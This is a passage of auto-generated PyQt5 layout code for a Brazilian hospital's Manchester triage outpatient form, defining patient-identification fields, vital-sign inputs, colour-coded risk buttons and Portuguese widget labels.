font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelSaturacao.setFont(font)
self.labelSaturacao.setObjectName("labelSaturacao")
self.labelNumeroFluxograma = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelNumeroFluxograma.setGeometry(QtCore.QRect(530, 160, 21, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelNumeroFluxograma.setFont(font)
self.labelNumeroFluxograma.setObjectName("labelNumeroFluxograma")
self.lineEditCoordenador = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditCoordenador.setGeometry(QtCore.QRect(130, 490, 191, 20))
self.lineEditCoordenador.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditCoordenador.setText("")
self.lineEditCoordenador.setObjectName("lineEditCoordenador")
self.lineEditFC = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditFC.setGeometry(QtCore.QRect(570, 260, 41, 20))
self.lineEditFC.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditFC.setText("")
self.lineEditFC.setObjectName("lineEditFC")
self.lineEditCoren = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditCoren.setGeometry(QtCore.QRect(380, 450, 51, 20))
self.lineEditCoren.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditCoren.setText("")
self.lineEditCoren.setObjectName("lineEditCoren")
self.line_3 = QtWidgets.QFrame(self.widgetClassificacaoRisco)
self.line_3.setGeometry(QtCore.QRect(-10, 520, 621, 20))
self.line_3.setFrameShape(QtWidgets.QFrame.HLine)
self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_3.setObjectName("line_3")
self.dateEditDataHoje = QtWidgets.QDateEdit(self.widgetClassificacaoRisco)
self.dateEditDataHoje.setGeometry(QtCore.QRect(370, 490, 81, 22))
self.dateEditDataHoje.setStyleSheet("background-color: rgb(242, 255, 250);")
self.dateEditDataHoje.setObjectName("dateEditDataHoje")
self.labelTemperatura = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelTemperatura.setGeometry(QtCore.QRect(230, 260, 41, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelTemperatura.setFont(font)
self.labelTemperatura.setObjectName("labelTemperatura")
self.radioAzul = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioAzul.setGeometry(QtCore.QRect(510, 230, 41, 21))
self.radioAzul.setStyleSheet("color: rgb(0, 255, 255);\n"
"background-color: rgb(0, 0, 0);")
self.radioAzul.setObjectName("radioAzul")
self.labelDestinoEncaminhamento = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelDestinoEncaminhamento.setGeometry(QtCore.QRect(10, 420, 191, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelDestinoEncaminhamento.setFont(font)
self.labelDestinoEncaminhamento.setObjectName("labelDestinoEncaminhamento")
self.labelCoordenador = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelCoordenador.setGeometry(QtCore.QRect(10, 490, 111, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelCoordenador.setFont(font)
self.labelCoordenador.setObjectName("labelCoordenador")
self.lineEditTemperatura = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditTemperatura.setGeometry(QtCore.QRect(270, 260, 51, 20))
self.lineEditTemperatura.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditTemperatura.setText("")
self.lineEditTemperatura.setObjectName("lineEditTemperatura")
self.radioButtonDestinoPSF = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioButtonDestinoPSF.setGeometry(QtCore.QRect(390, 420, 82, 17))
self.radioButtonDestinoPSF.setObjectName("radioButtonDestinoPSF")
self.labelDiscriminador = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelDiscriminador.setGeometry(QtCore.QRect(10, 200, 91, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelDiscriminador.setFont(font)
self.labelDiscriminador.setObjectName("labelDiscriminador")
self.labelClassificacaoRisco = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelClassificacaoRisco.setGeometry(QtCore.QRect(230, 0, 161, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelClassificacaoRisco.setFont(font)
self.labelClassificacaoRisco.setObjectName("labelClassificacaoRisco")
self.radioButtonDestinoConsultorio = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioButtonDestinoConsultorio.setGeometry(QtCore.QRect(210, 420, 82, 17))
self.radioButtonDestinoConsultorio.setObjectName("radioButtonDestinoConsultorio")
self.lineEditNumeroFluxograma = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditNumeroFluxograma.setGeometry(QtCore.QRect(560, 160, 51, 20))
self.lineEditNumeroFluxograma.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditNumeroFluxograma.setText("")
self.lineEditNumeroFluxograma.setObjectName("lineEditNumeroFluxograma")
self.radioAmarela = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioAmarela.setGeometry(QtCore.QRect(520, 200, 71, 21))
self.radioAmarela.setStyleSheet("color: rgb(239, 239, 0);\n"
"background-color: rgb(0, 0, 0);")
self.radioAmarela.setObjectName("radioAmarela")
self.labelEnfermeiro = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelEnfermeiro.setGeometry(QtCore.QRect(10, 450, 101, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelEnfermeiro.setFont(font)
self.labelEnfermeiro.setObjectName("labelEnfermeiro")
self.lineEditFluxograma = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditFluxograma.setGeometry(QtCore.QRect(100, 160, 381, 20))
self.lineEditFluxograma.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditFluxograma.setText("")
self.lineEditFluxograma.setObjectName("lineEditFluxograma")
self.lineEditDiscriminador = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditDiscriminador.setGeometry(QtCore.QRect(100, 200, 241, 20))
self.lineEditDiscriminador.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditDiscriminador.setText("")
self.lineEditDiscriminador.setObjectName("lineEditDiscriminador")
self.labelFluxograma = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelFluxograma.setGeometry(QtCore.QRect(10, 160, 81, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelFluxograma.setFont(font)
self.labelFluxograma.setObjectName("labelFluxograma")
self.labelGlasgow = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelGlasgow.setGeometry(QtCore.QRect(130, 260, 61, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelGlasgow.setFont(font)
self.labelGlasgow.setObjectName("labelGlasgow")
self.labelFC = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelFC.setGeometry(QtCore.QRect(540, 260, 21, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelFC.setFont(font)
self.labelFC.setObjectName("labelFC")
self.radioLaranja = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioLaranja.setGeometry(QtCore.QRect(460, 200, 61, 21))
self.radioLaranja.setStyleSheet("color: rgb(255, 138, 55);\n"
"background-color: rgb(0, 0, 0);\n"
"")
self.radioLaranja.setObjectName("radioLaranja")
self.labelGlicemia = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelGlicemia.setGeometry(QtCore.QRect(330, 260, 61, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelGlicemia.setFont(font)
self.labelGlicemia.setObjectName("labelGlicemia")
self.radioButtonVermelha = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioButtonVermelha.setGeometry(QtCore.QRect(390, 200, 71, 21))
self.radioButtonVermelha.setStyleSheet("color: rgb(255, 0, 0);\n"
"background-color: rgb(0, 0, 0);")
self.radioButtonVermelha.setObjectName("radioButtonVermelha")
self.labelCoren = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelCoren.setGeometry(QtCore.QRect(330, 450, 101, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelCoren.setFont(font)
self.labelCoren.setObjectName("labelCoren")
self.labelSituacaoQueixa = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelSituacaoQueixa.setGeometry(QtCore.QRect(10, 40, 111, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelSituacaoQueixa.setFont(font)
self.labelSituacaoQueixa.setObjectName("labelSituacaoQueixa")
self.labelData_2 = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelData_2.setGeometry(QtCore.QRect(330, 490, 31, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelData_2.setFont(font)
self.labelData_2.setObjectName("labelData_2")
self.textEditDescricaoSituacaoQueixa = QtWidgets.QTextEdit(self.widgetClassificacaoRisco)
self.textEditDescricaoSituacaoQueixa.setGeometry(QtCore.QRect(10, 60, 601, 91))
self.textEditDescricaoSituacaoQueixa.setStyleSheet("background-color: rgb(255, 249, 248);")
self.textEditDescricaoSituacaoQueixa.setObjectName("textEditDescricaoSituacaoQueixa")
self.lineEditEnfermeiro = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditEnfermeiro.setGeometry(QtCore.QRect(110, 450, 211, 20))
self.lineEditEnfermeiro.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditEnfermeiro.setText("")
self.lineEditEnfermeiro.setObjectName("lineEditEnfermeiro")
self.radioButtonDestinoAmbulatorio = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioButtonDestinoAmbulatorio.setGeometry(QtCore.QRect(300, 420, 82, 17))
self.radioButtonDestinoAmbulatorio.setObjectName("radioButtonDestinoAmbulatorio")
self.labelGrauDor = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelGrauDor.setGeometry(QtCore.QRect(450, 260, 61, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelGrauDor.setFont(font)
self.labelGrauDor.setObjectName("labelGrauDor")
self.lineEditGrauDor = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditGrauDor.setGeometry(QtCore.QRect(510, 260, 21, 20))
self.lineEditGrauDor.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditGrauDor.setText("")
self.lineEditGrauDor.setObjectName("lineEditGrauDor")
self.lineEditSaturacao = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditSaturacao.setGeometry(QtCore.QRect(70, 260, 51, 20))
self.lineEditSaturacao.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditSaturacao.setText("")
self.lineEditSaturacao.setObjectName("lineEditSaturacao")
self.textEditDescricaoClassificacaoCor = QtWidgets.QTextEdit(self.widgetClassificacaoRisco)
self.textEditDescricaoClassificacaoCor.setGeometry(QtCore.QRect(210, 300, 191, 91))
self.textEditDescricaoClassificacaoCor.setStyleSheet("background-color: rgb(255, 249, 248);")
self.textEditDescricaoClassificacaoCor.setObjectName("textEditDescricaoClassificacaoCor")
self.labelCor = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelCor.setGeometry(QtCore.QRect(350, 200, 31, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelCor.setFont(font)
self.labelCor.setObjectName("labelCor")
self.lineEditGlasgow = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditGlasgow.setGeometry(QtCore.QRect(190, 260, 31, 20))
self.lineEditGlasgow.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditGlasgow.setText("")
self.lineEditGlasgow.setObjectName("lineEditGlasgow")
self.lineEditGlicemia = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditGlicemia.setGeometry(QtCore.QRect(390, 260, 51, 20))
self.lineEditGlicemia.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditGlicemia.setText("")
self.lineEditGlicemia.setObjectName("lineEditGlicemia")
self.labelHoraFim = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelHoraFim.setGeometry(QtCore.QRect(490, 490, 41, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelHoraFim.setFont(font)
self.labelHoraFim.setObjectName("labelHoraFim")
self.timeEditHoraFim = QtWidgets.QTimeEdit(self.widgetClassificacaoRisco)
self.timeEditHoraFim.setGeometry(QtCore.QRect(540, 490, 61, 22))
self.timeEditHoraFim.setStyleSheet("background-color: rgb(242, 255, 250);")
self.timeEditHoraFim.setObjectName("timeEditHoraFim")
self.lineEditGlicemia_2 = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditGlicemia_2.setGeometry(QtCore.QRect(400, 450, 81, 20))
self.lineEditGlicemia_2.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditGlicemia_2.setText("")
self.lineEditGlicemia_2.setObjectName("lineEditGlicemia_2")
self.widgetCabecalho = QtWidgets.QWidget(self.scrollAreaWidgetContents)
self.widgetCabecalho.setGeometry(QtCore.QRect(20, 0, 611, 61))
self.widgetCabecalho.setObjectName("widgetCabecalho")
self.labelSubTitulo = QtWidgets.QLabel(self.widgetCabecalho)
self.labelSubTitulo.setGeometry(QtCore.QRect(80, 30, 461, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(True)
font.setWeight(75)
self.labelSubTitulo.setFont(font)
self.labelSubTitulo.setObjectName("labelSubTitulo")
self.line = QtWidgets.QFrame(self.widgetCabecalho)
self.line.setGeometry(QtCore.QRect(0, 50, 611, 20))
self.line.setFrameShape(QtWidgets.QFrame.HLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.labelTitulo = QtWidgets.QLabel(self.widgetCabecalho)
self.labelTitulo.setGeometry(QtCore.QRect(140, 10, 321, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(True)
font.setWeight(75)
self.labelTitulo.setFont(font)
self.labelTitulo.setObjectName("labelTitulo")
self.widgetRodapeHospital = QtWidgets.QWidget(self.scrollAreaWidgetContents)
self.widgetRodapeHospital.setGeometry(QtCore.QRect(20, 900, 611, 80))
self.widgetRodapeHospital.setObjectName("widgetRodapeHospital")
self.labelCNPJ = QtWidgets.QLabel(self.widgetRodapeHospital)
self.labelCNPJ.setGeometry(QtCore.QRect(200, 20, 211, 21))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(14)
self.labelCNPJ.setFont(font)
self.labelCNPJ.setObjectName("labelCNPJ")
self.labelTelefoneHosital = QtWidgets.QLabel(self.widgetRodapeHospital)
self.labelTelefoneHosital.setGeometry(QtCore.QRect(230, 60, 141, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(10)
self.labelTelefoneHosital.setFont(font)
self.labelTelefoneHosital.setObjectName("labelTelefoneHosital")
self.labelEnderecoHospital = QtWidgets.QLabel(self.widgetRodapeHospital)
self.labelEnderecoHospital.setGeometry(QtCore.QRect(190, 40, 231, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(10)
self.labelEnderecoHospital.setFont(font)
self.labelEnderecoHospital.setObjectName("labelEnderecoHospital")
self.labelAssociacao = QtWidgets.QLabel(self.widgetRodapeHospital)
self.labelAssociacao.setGeometry(QtCore.QRect(120, 0, 371, 21))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(14)
self.labelAssociacao.setFont(font)
self.labelAssociacao.setObjectName("labelAssociacao")
self.labelLogo = QtWidgets.QLabel(self.widgetRodapeHospital)
self.labelLogo.setGeometry(QtCore.QRect(20, 0, 91, 71))
self.labelLogo.setText("")
self.labelLogo.setPixmap(QtGui.QPixmap("Formularios/logoHospital.png"))
self.labelLogo.setObjectName("labelLogo")
self.widgetIdentificacaoPaciente = QtWidgets.QWidget(self.scrollAreaWidgetContents)
self.widgetIdentificacaoPaciente.setGeometry(QtCore.QRect(20, 60, 611, 291))
self.widgetIdentificacaoPaciente.setObjectName("widgetIdentificacaoPaciente")
self.labelEndereco = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelEndereco.setGeometry(QtCore.QRect(90, 170, 71, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelEndereco.setFont(font)
self.labelEndereco.setObjectName("labelEndereco")
self.labelIdade = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelIdade.setGeometry(QtCore.QRect(0, 90, 41, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelIdade.setFont(font)
self.labelIdade.setObjectName("labelIdade")
self.labelMae = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelMae.setGeometry(QtCore.QRect(260, 130, 31, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelMae.setFont(font)
self.labelMae.setObjectName("labelMae")
self.labelEtnia = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelEtnia.setGeometry(QtCore.QRect(180, 90, 41, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelEtnia.setFont(font)
self.labelEtnia.setObjectName("labelEtnia")
self.labelID = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelID.setGeometry(QtCore.QRect(550, 90, 21, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelID.setFont(font)
self.labelID.setObjectName("labelID")
self.labelCidade = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelCidade.setGeometry(QtCore.QRect(200, 240, 51, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelCidade.setFont(font)
self.labelCidade.setObjectName("labelCidade")
self.lineEditBairro = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditBairro.setGeometry(QtCore.QRect(50, 240, 131, 20))
self.lineEditBairro.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditBairro.setText("")
self.lineEditBairro.setObjectName("lineEditBairro")
self.labelData = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelData.setGeometry(QtCore.QRect(370, 50, 31, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelData.setFont(font)
self.labelData.setObjectName("labelData")
self.timeEditHoraInicio = QtWidgets.QTimeEdit(self.widgetIdentificacaoPaciente)
self.timeEditHoraInicio.setGeometry(QtCore.QRect(550, 50, 61, 22))
self.timeEditHoraInicio.setStyleSheet("background-color: rgb(242, 255, 250);")
self.timeEditHoraInicio.setObjectName("timeEditHoraInicio")
self.lineEditIdade = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditIdade.setGeometry(QtCore.QRect(60, 90, 101, 20))
self.lineEditIdade.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditIdade.setText("")
self.lineEditIdade.setObjectName("lineEditIdade")
self.lineEditMae = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditMae.setGeometry(QtCore.QRect(300, 130, 311, 20))
self.lineEditMae.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditMae.setText("")
self.lineEditMae.setObjectName("lineEditMae")
self.lineEditCidade = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditCidade.setGeometry(QtCore.QRect(260, 240, 231, 20))
self.lineEditCidade.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditCidade.setText("")
self.lineEditCidade.setObjectName("lineEditCidade")
self.labelIndentificacaoPaciente = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelIndentificacaoPaciente.setGeometry(QtCore.QRect(200, 0, 191, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelIndentificacaoPaciente.setFont(font)
self.labelIndentificacaoPaciente.setObjectName("labelIndentificacaoPaciente")
self.lineEditEtnia = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditEtnia.setGeometry(QtCore.QRect(220, 90, 101, 20))
self.lineEditEtnia.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditEtnia.setText("")
self.lineEditEtnia.setObjectName("lineEditEtnia")
self.dateEditDataNascimento = QtWidgets.QDateEdit(self.widgetIdentificacaoPaciente)
self.dateEditDataNascimento.setGeometry(QtCore.QRect(410, 50, 81, 22))
self.dateEditDataNascimento.setStyleSheet("background-color: rgb(242, 255, 250);")
self.dateEditDataNascimento.setObjectName("dateEditDataNascimento")
self.labelNumero = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelNumero.setGeometry(QtCore.QRect(300, 210, 21, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelNumero.setFont(font)
self.labelNumero.setObjectName("labelNumero")
self.lineEditProfissao = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditProfissao.setGeometry(QtCore.QRect(140, 130, 111, 20))
self.lineEditProfissao.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditProfissao.setText("")
self.lineEditProfissao.setObjectName("lineEditProfissao")
self.lineEditComplemento = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditComplemento.setGeometry(QtCore.QRect(490, 210, 121, 20))
self.lineEditComplemento.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditComplemento.setText("")
self.lineEditComplemento.setObjectName("lineEditComplemento")
self.lineEditNaturalidade = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditNaturalidade.setGeometry(QtCore.QRect(430, 90, 111, 20))
self.lineEditNaturalidade.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditNaturalidade.setText("")
self.lineEditNaturalidade.setObjectName("lineEditNaturalidade")
self.labelNaturalidade = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelNaturalidade.setGeometry(QtCore.QRect(330, 90, 91, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelNaturalidade.setFont(font)
self.labelNaturalidade.setObjectName("labelNaturalidade")
self.line_2 = QtWidgets.QFrame(self.widgetIdentificacaoPaciente)
self.line_2.setGeometry(QtCore.QRect(0, 270, 611, 20))
self.line_2.setFrameShape(QtWidgets.QFrame.HLine)
self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_2.setObjectName("line_2")
self.lineEditNumero = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditNumero.setGeometry(QtCore.QRect(330, 210, 51, 20))
self.lineEditNumero.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditNumero.setText("")
self.lineEditNumero.setObjectName("lineEditNumero")
self.lineEditRegistro = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditRegistro.setGeometry(QtCore.QRect(530, 20, 81, 20))
self.lineEditRegistro.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditRegistro.setText("")
self.lineEditRegistro.setObjectName("lineEditRegistro")
self.lineEditLongradouro = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditLongradouro.setGeometry(QtCore.QRect(90, 210, 201, 20))
self.lineEditLongradouro.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditLongradouro.setText("")
self.lineEditLongradouro.setObjectName("lineEditLongradouro")
self.lineEditUF = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditUF.setGeometry(QtCore.QRect(560, 240, 51, 20))
self.lineEditUF.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditUF.setText("")
self.lineEditUF.setObjectName("lineEditUF")
self.labelBairro = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelBairro.setGeometry(QtCore.QRect(0, 240, 41, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelBairro.setFont(font)
self.labelBairro.setObjectName("labelBairro")
self.lineEditID = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditID.setGeometry(QtCore.QRect(570, 90, 41, 20))
self.lineEditID.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditID.setText("")
self.lineEditID.setObjectName("lineEditID")
self.labelLongradouro = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelLongradouro.setGeometry(QtCore.QRect(0, 210, 81, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelLongradouro.setFont(font)
self.labelLongradouro.setObjectName("labelLongradouro")
self.lineEditNome = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditNome.setGeometry(QtCore.QRect(60, 50, 301, 20))
self.lineEditNome.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditNome.setText("")
self.lineEditNome.setObjectName("lineEditNome")
self.labelNome = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelNome.setGeometry(QtCore.QRect(0, 50, 41, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelNome.setFont(font)
self.labelNome.setObjectName("labelNome")
self.labelUF = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelUF.setGeometry(QtCore.QRect(520, 240, 21, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelUF.setFont(font)
self.labelUF.setObjectName("labelUF")
self.labelHoraInicio = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelHoraInicio.setGeometry(QtCore.QRect(500, 50, 41, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelHoraInicio.setFont(font)
self.labelHoraInicio.setObjectName("labelHoraInicio")
self.labelRegistro = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelRegistro.setGeometry(QtCore.QRect(460, 20, 61, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelRegistro.setFont(font)
self.labelRegistro.setObjectName("labelRegistro")
self.labelProfissao = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelProfissao.setGeometry(QtCore.QRect(0, 130, 131, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelProfissao.setFont(font)
self.labelProfissao.setObjectName("labelProfissao")
self.labelComplemento = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelComplemento.setGeometry(QtCore.QRect(390, 210, 91, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelComplemento.setFont(font)
self.labelComplemento.setObjectName("labelComplemento")
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.gridLayout.addWidget(self.scrollArea, 0, 0, 1, 1)
FichaAmbulatorialVerso.setCentralWidget(self.centralwidget)
self.retranslateUi(FichaAmbulatorialVerso)
QtCore.QMetaObject.connectSlotsByName(FichaAmbulatorialVerso)
def retranslateUi(self, FichaAmbulatorialVerso):
    """Apply the (pt-BR) display strings to every widget on the form.

    Generated by Qt Designer / pyuic5 — manual edits are lost when the
    .ui file is recompiled, so change the .ui file instead. All strings
    are routed through QCoreApplication.translate so the UI can be
    localised without touching the widget-construction code.
    """
    _translate = QtCore.QCoreApplication.translate
    FichaAmbulatorialVerso.setWindowTitle(_translate("FichaAmbulatorialVerso", "SISTEMA DE MANCHESTER"))
    # Risk-classification (Manchester triage) widgets.
    self.radioVerde.setText(_translate("FichaAmbulatorialVerso", "Verde"))
    self.labelSaturacao.setText(_translate("FichaAmbulatorialVerso", "Saturação:"))
    self.labelNumeroFluxograma.setText(_translate("FichaAmbulatorialVerso", "Nº:"))
    self.labelTemperatura.setText(_translate("FichaAmbulatorialVerso", "Temp:"))
    self.radioAzul.setText(_translate("FichaAmbulatorialVerso", "Azul"))
    self.labelDestinoEncaminhamento.setText(_translate("FichaAmbulatorialVerso", "DESTINO/ENCAMINHAMENTO: "))
